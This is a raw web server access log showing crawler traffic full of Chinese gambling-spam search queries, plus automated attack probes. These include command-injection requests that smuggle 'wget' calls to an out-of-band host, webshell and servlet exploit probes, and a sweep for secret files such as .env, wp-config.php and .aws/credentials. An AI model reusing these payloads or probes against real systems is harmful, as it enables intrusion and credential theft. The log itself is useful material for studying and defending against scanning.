114.119.150.34 - - [29/Aug/2026:23:12:47 -0300] "GET /?s=10bet%E4%B8%AD%E6%96%87-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90AC68%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E5%BD%A9%E7%A5%A8%E4%B8%AD%E5%A5%96%E5%8F%B7%E7%A0%81%E6%9F%A5%E8%AF%A2-10bet%E4%B8%AD%E6%96%87f2h67-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90AC68%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E5%BD%A9%E7%A5%A8%E4%B8%AD%E5%A5%96%E5%8F%B7%E7%A0%81%E6%9F%A5%E8%AF%A2gchz-10bet%E4%B8%AD%E6%96%87osq00-%E5%BD%A9%E7%A5%A8%E4%B8%AD%E5%A5%96%E5%8F%B7%E7%A0%81%E6%9F%A5%E8%AF%A2kyiq HTTP/1.1" 302 - "https://bestsou.cc/yrp/d8acd08f92a8d0f0b4debaefd0bf9085a8a8d4dca687eff6dbc3edd294ff.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
111.90.145.92 - - [29/Aug/2026:23:12:55 -0300] "GET /?author=1 HTTP/1.1" 302 - "-" "-"
114.119.130.253 - - [29/Aug/2026:23:14:51 -0300] "GET /?s=100w%E5%A4%AA%E9%98%B3%E8%83%BD%E5%AE%A4%E5%86%85%E7%85%A7%E6%98%8E%E7%81%AF-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90BB76%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E4%B8%9C%E5%8C%97%E5%BE%80%E4%BA%8B6%E5%87%BA%E7%8B%B1%E5%B0%8F%E8%AF%B4%E9%98%85%E8%AF%BB-100w%E5%A4%AA%E9%98%B3%E8%83%BD%E5%AE%A4%E5%86%85%E7%85%A7%E6%98%8E%E7%81%AF0ei2m-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90BB76%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E4%B8%9C%E5%8C%97%E5%BE%80%E4%BA%8B6%E5%87%BA%E7%8B%B1%E5%B0%8F%E8%AF%B4%E9%98%85%E8%AF%BB8gnn-100w%E5%A4%AA%E9%98%B3%E8%83%BD%E5%AE%A4%E5%86%85%E7%85%A7%E6%98%8E%E7%81%AFb7ant-%E4%B8%9C%E5%8C%97%E5%BE%80%E4%BA%8B6%E5%87%BA%E7%8B%B1%E5%B0%8F%E8%AF%B4%E9%98%85%E8%AF%BB273i HTTP/1.1" 302 - "https://www.hegum.top/wzvhoau/olympics%20ratings%20disaster-4c647d4552/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.137.190 - - [29/Aug/2026:23:17:03 -0300] "GET /?s=%E9%BA%BB%E5%B0%86app%E6%8E%A8%E8%8D%90-%E3%80%90%E2%9C%94%EF%B8%8F%E5%AE%98%E7%BD%91AA58%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E6%BE%B3%E9%97%A8%E6%B0%B4%E7%96%97%E6%94%BB%E7%95%A5-%E9%BA%BB%E5%B0%86app%E6%8E%A8%E8%8D%90pgdgu-%E3%80%90%E2%9C%94%EF%B8%8F%E5%AE%98%E7%BD%91AA58%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E6%BE%B3%E9%97%A8%E6%B0%B4%E7%96%97%E6%94%BB%E7%95%A5vpit-%E9%BA%BB%E5%B0%86app%E6%8E%A8%E8%8D%9097jy6-%E6%BE%B3%E9%97%A8%E6%B0%B4%E7%96%97%E6%94%BB%E7%95%A5x9qb HTTP/1.1" 302 - "https://yousearch.cc/ssg/d7dcedd7ddf2d682bcdecd87d88f868eb9fcd4b3c9dcfe89.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.134.6 - - [29/Aug/2026:23:19:02 -0300] "GET /?s=%E9%BA%BB%E5%B0%86%E8%A7%84%E5%88%99%E6%96%B0%E5%8A%A0%E5%9D%A1-%E3%80%90%E2%9C%94%EF%B8%8F%E5%AE%98%E7%BD%91AA58%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E6%8E%92%E7%90%83%E6%AF%94%E5%88%86%E6%98%BE%E7%A4%BA-%E9%BA%BB%E5%B0%86%E8%A7%84%E5%88%99%E6%96%B0%E5%8A%A0%E5%9D%A1raao7-%E3%80%90%E2%9C%94%EF%B8%8F%E5%AE%98%E7%BD%91AA58%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E6%8E%92%E7%90%83%E6%AF%94%E5%88%86%E6%98%BE%E7%A4%BAhtxt-%E9%BA%BB%E5%B0%86%E8%A7%84%E5%88%99%E6%96%B0%E5%8A%A0%E5%9D%A1ist10-%E6%8E%92%E7%90%83%E6%AF%94%E5%88%86%E6%98%BE%E7%A4%BAzzlu HTTP/1.1" 302 - "https://www.ceospacela.com/wmo/ddebe4d6f283d9e8a3d5aafc86b6c8d2aec8d59afbd7ace587b1aa5509.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
111.90.145.92 - - [29/Aug/2026:23:19:49 -0300] "GET /backupmgt/localJob.php?session=fail;wget+http://da9n81ef7glomambb050xuihb9hn9w1nn.oast.site; HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:129.0) Gecko/20100101 Firefox/129.0"
111.90.145.92 - - [29/Aug/2026:23:19:49 -0300] "POST /index.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5"
111.90.145.92 - - [29/Aug/2026:23:19:49 -0300] "POST /website/blog/ HTTP/1.1" 404 - "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36"
111.90.145.92 - - [29/Aug/2026:23:19:50 -0300] "POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15"
111.90.145.92 - - [29/Aug/2026:23:19:50 -0300] "GET /reports/rwservlet/showenv HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/3.6.9"
111.90.145.92 - - [29/Aug/2026:23:19:51 -0300] "POST /seeyon/htmlofficeservlet HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Safari/605.1.15"
111.90.145.92 - - [29/Aug/2026:23:19:53 -0300] "POST /_search HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 6.2; rv:140.0.) Gecko/20100101 Firefox/140.0."
111.90.145.92 - - [29/Aug/2026:23:19:54 -0300] "GET /reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:/// HTTP/1.1" 404 - "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
111.90.145.92 - - [29/Aug/2026:23:19:54 -0300] "POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
111.90.145.92 - - [29/Aug/2026:23:19:54 -0300] "GET /backupmgt/pre_connect_check.php?auth_name=fail;wget+http://da9n81ef7glomambb050bzknp3gj3pafq.oast.site; HTTP/1.1" 404 - "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
111.90.145.92 - - [29/Aug/2026:23:19:54 -0300] "GET /seeyon/test123456.jsp?pwd=asasd3344&3Ic0818QkRofKIMSDE6hFgW907e=ipconfig HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64; rv:1.9.5.20) Gecko/ Firefox/3.6.17"
111.90.145.92 - - [29/Aug/2026:23:19:54 -0300] "POST /lcms/index.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0"
114.119.134.6 - - [29/Aug/2026:23:21:13 -0300] "GET /?s=%E9%B2%81%E5%9B%AD%E6%9C%80%E5%90%8E%E4%B8%80%E9%83%A8%E4%BD%9C%E5%93%81-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90BB76%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E7%94%A8%E5%85%B5%E4%BB%A5%E4%B8%80%E5%BD%93%E5%8D%81%E4%B8%BB%E4%BA%BA%E5%85%AC%E6%98%AF%E8%B0%81-%E9%B2%81%E5%9B%AD%E6%9C%80%E5%90%8E%E4%B8%80%E9%83%A8%E4%BD%9C%E5%93%81otbbt-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90BB76%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E7%94%A8%E5%85%B5%E4%BB%A5%E4%B8%80%E5%BD%93%E5%8D%81%E4%B8%BB%E4%BA%BA%E5%85%AC%E6%98%AF%E8%B0%81dsmr-%E9%B2%81%E5%9B%AD%E6%9C%80%E5%90%8E%E4%B8%80%E9%83%A8%E4%BD%9C%E5%93%8181kc0-%E7%94%A8%E5%85%B5%E4%BB%A5%E4%B8%80%E5%BD%93%E5%8D%81%E4%B8%BB%E4%BA%BA%E5%85%AC%E6%98%AF%E8%B0%81gzdy HTTP/1.1" 302 - "https://www.torrentreel25.top/xpgeod/%E5%BD%A2%E5%AE%B9%E6%99%AF%E8%89%B2%E4%BC%98%E7%BE%8E%E7%9A%84%E8%AF%97-6910010354/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.150.34 - - [29/Aug/2026:23:23:16 -0300] "GET /?s=%E9%AB%98%E5%B0%94%E5%A4%ABgti%E6%B6%82%E8%A3%85-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90BB76%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E5%90%89%E4%BB%96%E8%B0%83%E9%9F%B3%E5%99%A8app%E4%B8%8B%E8%BD%BD-%E9%AB%98%E5%B0%94%E5%A4%ABgti%E6%B6%82%E8%A3%857a4cu-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90BB76%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E5%90%89%E4%BB%96%E8%B0%83%E9%9F%B3%E5%99%A8app%E4%B8%8B%E8%BD%BDsd62-%E9%AB%98%E5%B0%94%E5%A4%ABgti%E6%B6%82%E8%A3%85zjpka-%E5%90%89%E4%BB%96%E8%B0%83%E9%9F%B3%E5%99%A8app%E4%B8%8B%E8%BD%BDtm1n HTTP/1.1" 302 - "https://joiocsg.top/slom/nfl%E5%9C%A8%E7%BA%BF-323004652f/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.145.125 - - [29/Aug/2026:23:25:25 -0300] "GET /?s=%E9%AB%98%E4%B8%AD%E6%AF%95%E4%B8%9A%E5%8D%81%E5%B9%B4%E5%90%8C%E5%AD%A6%E8%81%9A%E4%BC%9A%E7%AD%96%E5%88%92-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90BB76%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E7%BA%A2%E8%AD%A62%E6%9C%80%E5%BF%AB%E9%80%9A%E5%85%B3-%E9%AB%98%E4%B8%AD%E6%AF%95%E4%B8%9A%E5%8D%81%E5%B9%B4%E5%90%8C%E5%AD%A6%E8%81%9A%E4%BC%9A%E7%AD%96%E5%88%92q59p9-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90BB76%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E7%BA%A2%E8%AD%A62%E6%9C%80%E5%BF%AB%E9%80%9A%E5%85%B3yqjw-%E9%AB%98%E4%B8%AD%E6%AF%95%E4%B8%9A%E5%8D%81%E5%B9%B4%E5%90%8C%E5%AD%A6%E8%81%9A%E4%BC%9A%E7%AD%96%E5%88%92o0mkb-%E7%BA%A2%E8%AD%A62%E6%9C%80%E5%BF%AB%E9%80%9A%E5%85%B3fg58 HTTP/1.1" 302 - "https://www.99pm.top/xhhd/%E5%85%AD%E5%90%88%E5%BD%A9%20%E5%B7%A5%E5%85%B7-675a75614d/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.134.6 - - [29/Aug/2026:23:27:29 -0300] "GET /?s=%E9%A9%AC%E6%9D%A5%E8%A5%BF%E4%BA%9A%E8%B5%9B%E9%A9%AC%E6%8A%95%E6%B3%A8-%E3%80%90%E2%9C%94%EF%B8%8F%E5%AE%98%E7%BD%91AA58%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E7%8E%8B%E7%82%B8%E6%84%8F%E6%80%9D-%E9%A9%AC%E6%9D%A5%E8%A5%BF%E4%BA%9A%E8%B5%9B%E9%A9%AC%E6%8A%95%E6%B3%A81nt73-%E3%80%90%E2%9C%94%EF%B8%8F%E5%AE%98%E7%BD%91AA58%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E7%8E%8B%E7%82%B8%E6%84%8F%E6%80%9D6ov7-%E9%A9%AC%E6%9D%A5%E8%A5%BF%E4%BA%9A%E8%B5%9B%E9%A9%AC%E6%8A%95%E6%B3%A8p11hh-%E7%8E%8B%E7%82%B8%E6%84%8F%E6%80%9Dhm0t HTTP/1.1" 302 - "https://baomoi.top/lazdhhso/58%E5%90%8C%E5%9F%8E%E5%80%8B%E4%BA%BA%E7%99%BC%E5%B8%83%E9%99%90%E5%88%B6-73460f7447/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.145.125 - - [29/Aug/2026:23:29:37 -0300] "GET /?s=%E9%A9%AC%20%E4%BC%9A%20%E8%B6%B3%E7%90%83%20%E8%B5%94%20%E7%8E%87-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90AC68%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E6%AC%A7%E5%86%A0%E5%8E%86%E5%B1%8A%E5%86%A0%E5%86%9B-%E9%A9%AC%20%E4%BC%9A%20%E8%B6%B3%E7%90%83%20%E8%B5%94%20%E7%8E%87uloou-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90AC68%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E6%AC%A7%E5%86%A0%E5%8E%86%E5%B1%8A%E5%86%A0%E5%86%9Bgvk6-%E9%A9%AC%20%E4%BC%9A%20%E8%B6%B3%E7%90%83%20%E8%B5%94%20%E7%8E%877s229-%E6%AC%A7%E5%86%A0%E5%8E%86%E5%B1%8A%E5%86%A0%E5%86%9Bbmls HTTP/1.1" 302 - "https://baskino-hd1.top/gcuxje/bn0200%2056e-52545f177c/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
80.79.5.250 - - [29/Aug/2026:23:29:47 -0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; ja-JP) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4"
91.92.42.131 - - [29/Aug/2026:23:30:25 -0300] "GET /info.php HTTP/1.1" 404 - "http://cienp.org.br/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
91.92.42.131 - - [29/Aug/2026:23:30:25 -0300] "GET /app.js HTTP/1.1" 404 - "http://cienp.org.br/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
91.92.42.131 - - [29/Aug/2026:23:30:25 -0300] "GET /config.php HTTP/1.1" 404 - "http://cienp.org.br/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15"
91.92.42.131 - - [29/Aug/2026:23:30:25 -0300] "GET /.env HTTP/1.1" 404 - "http://cienp.org.br/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15"
91.92.42.131 - - [29/Aug/2026:23:30:25 -0300] "GET /wp-config.php HTTP/1.1" 404 - "http://cienp.org.br/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
91.92.42.131 - - [29/Aug/2026:23:30:25 -0300] "GET /server.js HTTP/1.1" 404 - "http://cienp.org.br/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
91.92.42.131 - - [29/Aug/2026:23:30:25 -0300] "GET /.git/config HTTP/1.1" 404 - "http://cienp.org.br/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
91.92.42.131 - - [29/Aug/2026:23:30:25 -0300] "GET /appsettings.json HTTP/1.1" 404 - "http://cienp.org.br/" "Mozilla/5.0 (X11; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0"
91.92.42.131 - - [29/Aug/2026:23:30:25 -0300] "GET /phpinfo.php HTTP/1.1" 404 - "http://cienp.org.br/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0"
114.119.134.6 - - [29/Aug/2026:23:31:43 -0300] "GET /?s=%E9%A6%99%E6%B8%AF%E5%8D%9A%E5%BD%A9%E8%AE%BA%E5%9D%9B-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90AC68%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E8%B6%B3%E7%90%83%20%E8%83%9C%E5%B9%B3%E8%B4%9F-%E9%A6%99%E6%B8%AF%E5%8D%9A%E5%BD%A9%E8%AE%BA%E5%9D%9Bjvwjh-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90AC68%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E8%B6%B3%E7%90%83%20%E8%83%9C%E5%B9%B3%E8%B4%9Fc1ss-%E9%A6%99%E6%B8%AF%E5%8D%9A%E5%BD%A9%E8%AE%BA%E5%9D%9B2epts-%E8%B6%B3%E7%90%83%20%E8%83%9C%E5%B9%B3%E8%B4%9Fhrsh HTTP/1.1" 302 - "https://www.latheonline.top/uroqzk/%E5%8E%9F%E9%98%B3%E5%8D%8E%E9%BE%99%E4%B8%80%E5%8F%B7%E9%99%A2%E5%B0%BA%E5%AF%B8%E5%9B%BE-71076f6140/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
91.92.42.131 - - [29/Aug/2026:23:32:48 -0300] "GET /web.config HTTP/1.1" 404 - "http://cienp.org.br/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
91.92.42.131 - - [29/Aug/2026:23:32:48 -0300] "GET /config.js HTTP/1.1" 404 - "http://cienp.org.br/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
91.92.42.131 - - [29/Aug/2026:23:32:48 -0300] "GET /composer.json HTTP/1.1" 404 - "http://cienp.org.br/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15"
91.92.42.131 - - [29/Aug/2026:23:32:49 -0300] "GET /settings.php HTTP/1.1" 404 - "http://cienp.org.br/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
91.92.42.131 - - [29/Aug/2026:23:32:49 -0300] "GET /.env.bak HTTP/1.1" 404 - "http://cienp.org.br/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0"
91.92.42.131 - - [29/Aug/2026:23:32:49 -0300] "GET /application.yml HTTP/1.1" 404 - "http://cienp.org.br/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
91.92.42.131 - - [29/Aug/2026:23:32:49 -0300] "GET /database.php HTTP/1.1" 404 - "http://cienp.org.br/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0"
91.92.42.131 - - [29/Aug/2026:23:32:49 -0300] "GET /db.php HTTP/1.1" 404 - "http://cienp.org.br/" "Mozilla/5.0 (X11; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0"
91.92.42.131 - - [29/Aug/2026:23:32:49 -0300] "GET /docker-compose.yml HTTP/1.1" 404 - "http://cienp.org.br/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
91.92.42.131 - - [29/Aug/2026:23:32:49 -0300] "GET /.gitconfig HTTP/1.1" 404 - "http://cienp.org.br/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
91.92.42.131 - - [29/Aug/2026:23:33:21 -0300] "GET /php_info.php HTTP/1.1" 404 - "http://cienp.org.br/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
91.92.42.131 - - [29/Aug/2026:23:33:21 -0300] "GET /portal/phpinfo.php HTTP/1.1" 404 - "http://cienp.org.br/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0"
91.92.42.131 - - [29/Aug/2026:23:33:21 -0300] "GET /config.json HTTP/1.1" 404 - "http://cienp.org.br/" "Mozilla/5.0 (X11; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0"
91.92.42.131 - - [29/Aug/2026:23:33:21 -0300] "GET /pinfo.php HTTP/1.1" 404 - "http://cienp.org.br/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0"
91.92.42.131 - - [29/Aug/2026:23:33:22 -0300] "GET /config/application.yml HTTP/1.1" 404 - "http://cienp.org.br/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
91.92.42.131 - - [29/Aug/2026:23:33:22 -0300] "GET /functions.php HTTP/1.1" 404 - "http://cienp.org.br/" "Mozilla/5.0 (X11; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0"
91.92.42.131 - - [29/Aug/2026:23:33:22 -0300] "GET /app/config/parameters.yml HTTP/1.1" 404 - "http://cienp.org.br/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
91.92.42.131 - - [29/Aug/2026:23:33:22 -0300] "GET /index.php HTTP/1.1" 302 - "http://cienp.org.br/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
91.92.42.131 - - [29/Aug/2026:23:33:22 -0300] "GET /config/parameters.yml HTTP/1.1" 404 - "http://cienp.org.br/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
91.92.42.131 - - [29/Aug/2026:23:33:22 -0300] "GET /configuration.php HTTP/1.1" 404 - "http://cienp.org.br/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
91.92.42.131 - - [29/Aug/2026:23:33:22 -0300] "GET /.aws/credentials HTTP/1.1" 404 - "http://cienp.org.br/" "Mozilla/5.0 (X11; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0"
91.92.42.131 - - [29/Aug/2026:23:33:22 -0300] "GET /test.php HTTP/1.1" 404 - "http://cienp.org.br/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0"
91.92.42.131 - - [29/Aug/2026:23:33:22 -0300] "GET /phpinfo/info.php HTTP/1.1" 404 - "http://cienp.org.br/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15"
91.92.42.131 - - [29/Aug/2026:23:33:22 -0300] "GET /.env-config.js HTTP/1.1" 404 - "http://cienp.org.br/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0"
91.92.42.131 - - [29/Aug/2026:23:33:22 -0300] "GET /.env.js HTTP/1.1" 404 - "http://cienp.org.br/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
91.92.42.131 - - [29/Aug/2026:23:33:22 -0300] "GET /settings.py HTTP/1.1" 404 - "http://cienp.org.br/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0"
91.92.42.131 - - [29/Aug/2026:23:33:22 -0300] "GET /server_info.php HTTP/1.1" 404 - "http://cienp.org.br/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
47.128.31.20 - - [29/Aug/2026:23:39:14 -0300] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
114.119.145.163 - - [29/Aug/2026:23:39:28 -0300] "GET /?s=%E9%A2%90%E5%92%8C%E5%9B%AD%E5%9C%A8%E5%93%AA%E9%87%8C-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90KK37%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E6%8B%BC%E5%A4%9A%E5%A4%9A%E5%88%9A%E5%BC%80%E5%A7%8B%E6%80%8E%E4%B9%88%E5%88%B7-%E9%A2%90%E5%92%8C%E5%9B%AD%E5%9C%A8%E5%93%AA%E9%87%8Cnz2d6-%E3%80%90%E2%9C%94%EF%B8%8F%E6%8E%A8%E8%8D%90KK37%C2%B7CC%E2%9C%94%EF%B8%8F%E3%80%91-%E6%8B%BC%E5%A4%9A%E5%A4%9A%E5%88%9A%E5%BC%80%E5%A7%8B%E6%80%8E%E4%B9%88%E5%88%B7k350-%E9%A2%90%E5%92%8C%E5%9B%AD%E5%9C%A8%E5%93%AA%E9%87%8Ccnvf9-%E6%8B%BC%E5%A4%9A%E5%A4%9A%E5%88%9A%E5%BC%80%E5%A7%8B%E6%80%8E%E4%B9%88%E5%88%B7a9hx HTTP/1.1" 302 - "https://www.katehudson.net/vwe/dea380d4fd8284c2e6869b965a5317518cff8a81dbec.html" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
